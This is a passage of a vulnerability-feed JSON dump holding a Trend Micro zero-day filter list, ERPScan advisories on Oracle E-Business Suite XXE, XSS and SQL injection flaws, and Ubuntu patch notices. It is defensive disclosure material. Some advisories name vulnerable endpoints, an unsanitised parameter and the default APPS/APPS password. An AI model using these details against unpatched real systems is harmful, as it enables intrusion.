program, found that most of these vulnerabilities are in the areas of memory corruption, poor credential management, lack of authentication/authorization and insecure defaults, and code injection bugs, all of which are preventable through secure development practices.\n\nZDI has released the companion paper that provides the details of what was covered in their presentation. You can access the full report and read commentary from Brian Gorenc here: <https://www.zerodayinitiative.com/blog/2017/5/19/hacker-machine-interface-the-state-of-scada-hmi-security>.\n\n**Zero-Day Filters**\n\nThere are 18 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Foxit (1)_**\n\n| \n\n * 28323: ZDI-CAN-4816: Zero Day Initiative Vulnerability (Foxit Reader)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 28287: ZDI-CAN-4759-4761: Zero Day Initiative Vulnerability (HPE Intelligent Management Center)\n * 28318: ZDI-CAN-4808-4809: Zero Day Initiative Vulnerability (HPE Intelligent Management)**_ _** \n---|--- \n| \n \n**_Trend Micro (15)_**\n\n| \n\n * 28282: HTTPS: Trend Micro InterScan Web Security TestingADKerberos Command Injection (ZDI-17-217)\n * 28293: ZDI-CAN-4645,4649: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28295: ZDI-CAN-4648: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28296: ZDI-CAN-4657,4806: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28297: ZDI-CAN-4658: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28298: ZDI-CAN-4666: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28300: ZDI-CAN-4679: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28301: ZDI-CAN-4691: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28302: ZDI-CAN-4779: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28303: ZDI-CAN-4781: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28310: ZDI-CAN-4782-4783,4787: Zero Day Initiative Vulnerability (Trend Micro Mobile Security)\n * 28311: ZDI-CAN-4786: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28312: ZDI-CAN-4791: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28313: ZDI-CAN-4792-4793,4796: Zero Day Initiative Vulnerability (Trend Micro Mobile Security)\n * 28317: ZDI-CAN-4794: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-15-2017/>).", "modified": "2017-05-26T18:26:02", "published": "2017-05-26T18:26:02", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-22-2017/", "id": "TRENDMICROBLOG:30FF57A1D82576B03F12B5F844672FC0", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 22, 2017", "type": "trendmicroblog", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", 